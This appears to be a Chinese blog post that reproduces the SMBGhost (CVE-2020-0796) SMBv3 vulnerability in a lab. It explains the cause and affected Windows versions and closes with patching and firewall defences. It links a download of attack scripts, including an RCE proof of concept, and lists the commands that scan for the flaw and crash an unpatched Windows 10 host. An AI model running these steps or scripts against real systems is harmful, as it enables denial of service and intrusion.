CVE-2020-0796永恒之蓝2.0(漏洞复现)

目录

前言

产生原因

影响范围

漏洞复现

复现环境

复现步骤

防御措施

总结


前言

在网络安全的战场上,漏洞一直是攻防双方关注的焦点。CVE-2020-0796,这个被称为 “永恒之蓝 2.0” 的漏洞,一度引起了广泛的关注与担忧。它究竟是怎样的一个漏洞,又会对我们的系统产生怎样的威胁?本文将深入探讨这个漏洞,并进行漏洞复现,同时为大家提供有效的防御措施。

产生原因

这个漏洞的产生主要源于 Windows 对 SMBv3 协议处理中的缺陷。当 SMBv3 协议处理某些特制的压缩数据包时,存在缓冲区溢出的问题。Windows 系统在解析这些数据包时,没有对数据包的长度和内容进行严格的边界检查,从而导致攻击者可以精心构造恶意数据包,使得系统在处理这些数据包时发生缓冲区溢出,进而执行攻击者预先植入的恶意代码。

影响范围

该漏洞影响众多基于 Windows 的操作系统,包括但不限于:

  • Windows Server 2019
  • Windows 10 Version 1903、1909 等较新版本

微软官方也发布了相关安全公告,建议用户尽快进行更新以修复此漏洞。

漏洞复现

通过网盘分享的文件:永恒之蓝攻击脚本
链接: https://pan.baidu.com/s/1ZtQEMg2nBtn6VZtfg6_k1g?pwd=5c6r 提取码: 5c6r 
--来自百度网盘超级会员v3的分享

复现环境

  • 攻击机:Kali Linux    
  • 目标机:Windows 10(未安装相关安全补丁)

复现步骤

使用的命令

nmap -p 445 --script=smb-protocols <目标IP>    #使用Nmap对目标网络进行扫描
unzip CVE-2020-0796.zip                        #解压攻击压缩包
cd CVE-2020-0796                               #进入到解压的文件夹
cd SMBGhost                                    #切换到漏洞检测目录
python3 scanner.py 10.0.0.103                  #使用python3脚本进行检测目标ip地址是否有此漏洞
cd ../CVE-2020-0796-PoC                        #切换到攻击脚本目录
python3 CVE-2020-0796.py 10.0.0.103            #使用python3进行攻击

     1.上传永恒之蓝攻击脚本,并进行解压

  2.解压后切换到解压后的路径中,并查看文件夹下的内容

drwxrwxrwx 4 root root 4096 2024年 6月29日  CVE-2020-0796-PoC  #蓝屏攻击脚本
drwxrwxrwx 2 root root 4096 2024年 6月29日  SMBGhost           #扫描脚本
drwxrwxrwx 2 root root 4096 2024年 6月29日  SMBGhost_RCE_PoC   #远程控制攻击脚本

 3.切换进入扫描脚本文件夹,使用python3运行扫描脚本,扫描目标主机是否存在此漏洞

 4.切换进入攻击脚本,此时利用脚本进行攻击

 5.此时查看目标靶机已经蓝屏

至此,CVE-2020-0796漏洞复现结束。

防御措施

及时更新系统:安装微软发布的安全补丁是最有效的防御手段。用户应定期检查系统更新,并及时安装。

网络隔离:对不同安全级别的网络进行隔离,限制 SMBv3 协议的访问范围,减少攻击面。

启用防火墙:配置防火墙规则,阻止未经授权的 SMBv3 连接请求。可以只允许特定的 IP 地址或网络段访问 SMB 服务。

总结

CVE-2020-0796“永恒之蓝 2.0” 漏洞再次给我们敲响了网络安全的警钟。了解漏洞的原理、影响范围和防御措施,有助于我们更好地保护自己的系统安全。在日常运维中,要养成及时更新系统、加强网络安全防护的好习惯,共同营造一个安全的网络环境。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值